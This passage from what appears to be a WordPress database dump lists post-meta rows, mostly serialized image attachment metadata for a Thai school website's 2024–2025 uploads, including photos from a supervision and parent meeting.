\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-09-12-213449-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102112;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3107,1159,'_thumbnail_id','1161'),
(3108,1159,'_edit_last','1'),
(3109,1159,'title_style','default'),
(3110,1159,'_title_style','field_5d1a0217cf408'),
(3111,1159,'related',''),
(3112,1159,'_related','field_603b51c3e183e'),
(3113,1162,'title_style','default'),
(3114,1162,'_title_style','field_5d1a0217cf408'),
(3115,1162,'related',''),
(3116,1162,'_related','field_603b51c3e183e'),
(3117,1159,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/สุขาดีมีความสุข.mp4\n8844314\nvideo/mp4\n'),
(3118,1164,'_edit_lock','1746764835:1'),
(3119,1165,'_wp_attached_file','2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2.jpg'),
(3120,1165,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:128:\"2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2.jpg\";s:8:\"filesize\";i:274153;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17001;}s:5:\"large\";a:5:{s:4:\"file\";s:129:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124918;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8492;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79119;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21913;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3121,1166,'_wp_attached_file','2025/05/291494_0.jpg'),
(3122,1167,'_wp_attached_file','2025/05/291495_0.jpg'),
(3123,1166,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:848;s:6:\"height\";i:576;s:4:\"file\";s:20:\"2025/05/291494_0.jpg\";s:8:\"filesize\";i:76195;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291494_0-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20046;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291494_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8673;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291494_0-768x522.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82039;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291494_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22860;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3124,1167,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:815;s:6:\"height\";i:788;s:4:\"file\";s:20:\"2025/05/291495_0.jpg\";s:8:\"filesize\";i:92698;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291495_0-300x290.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25096;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291495_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8485;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291495_0-768x743.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:743;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104649;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291495_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18141;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3125,1168,'_wp_attached_file','2025/05/291498_0.jpg'),
(3126,1169,'_wp_attached_file','2025/05/291497_0.jpg'),
(3127,1168,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:936;s:6:\"height\";i:745;s:4:\"file\";s:20:\"2025/05/291498_0.jpg\";s:8:\"filesize\";i:99243;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291498_0-300x239.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20460;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291498_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8439;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291498_0-768x611.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90408;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291498_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19319;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3128,1169,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1313;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2025/05/291497_0.jpg\";s:8:\"filesize\";i:154589;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291497_0-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19265;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291497_0-1024x643.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:643;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133047;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291497_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291497_0-768x482.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86700;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291497_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22659;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3129,1170,'_wp_attached_file','2025/05/291499_0.jpg'),
(3130,1170,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2025/05/291499_0.jpg\";s:8:\"filesize\";i:237252;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291499_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16108;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291499_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128959;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291499_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7917;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291499_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79035;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"291499_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246855;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291499_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3131,1171,'_wp_attached_file','2025/05/291496_0.jpg'),
(3132,1171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1642;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2025/05/291496_0.jpg\";s:8:\"filesize\";i:244262;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291496_0-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18607;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291496_0-1024x599.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145759;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291496_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9363;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291496_0-768x449.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92297;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"291496_0-1536x898.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:898;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271556;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291496_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3133,1172,'_wp_attached_file','2025/05/291500_0.jpg'),
(3134,1172,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2025/05/291500_0.jpg\";s:8:\"filesize\";i:209049;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291500_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15077;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291500_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115395;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291500_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7422;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291500_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71435;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"291500_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219446;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291500_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19541;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3135,1173,'_wp_attached_file','2025/05/291501_0.jpg'),
(3136,1173,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2025/05/291501_0.jpg\";s:8:\"filesize\";i:264310;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291501_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18464;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291501_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146744;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291501_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9539;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291501_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90500;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"291501_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:276730;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291501_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23901;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3137,1174,'_wp_attached_file','2025/05/291502_0.jpg'),
(3138,1174,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2025/05/291502_0.jpg\";s:8:\"filesize\";i:233846;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"291502_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16744;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"291502_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129141;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"291502_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8225;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"291502_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79762;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"291502_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242889;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"291502_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21470;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3139,1175,'_wp_attached_file','2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1.jpg'),
(3140,1175,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:128:\"2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1.jpg\";s:8:\"filesize\";i:331185;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19829;}s:5:\"large\";a:5:{s:4:\"file\";s:129:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148184;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7985;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93351;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21838;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3141,1176,'_wp_attached_file','2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3.jpg'),
(3142,1176,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:128:\"2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3.jpg\";s:8:\"filesize\";i:321339;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18451;}s:5:\"large\";a:5:{s:4:\"file\";s:129:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7249;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89434;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18613;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3143,1177,'_wp_attached_file','2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1.jpg'),
(3144,1177,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:130:\"2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1.jpg\";s:8:\"filesize\";i:274153;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:130:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17001;}s:5:\"large\";a:5:{s:4:\"file\";s:131:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124918;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:130:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8492;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:130:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79119;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:130:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21913;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3145,1178,'_wp_attached_file','2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4.jpg'),
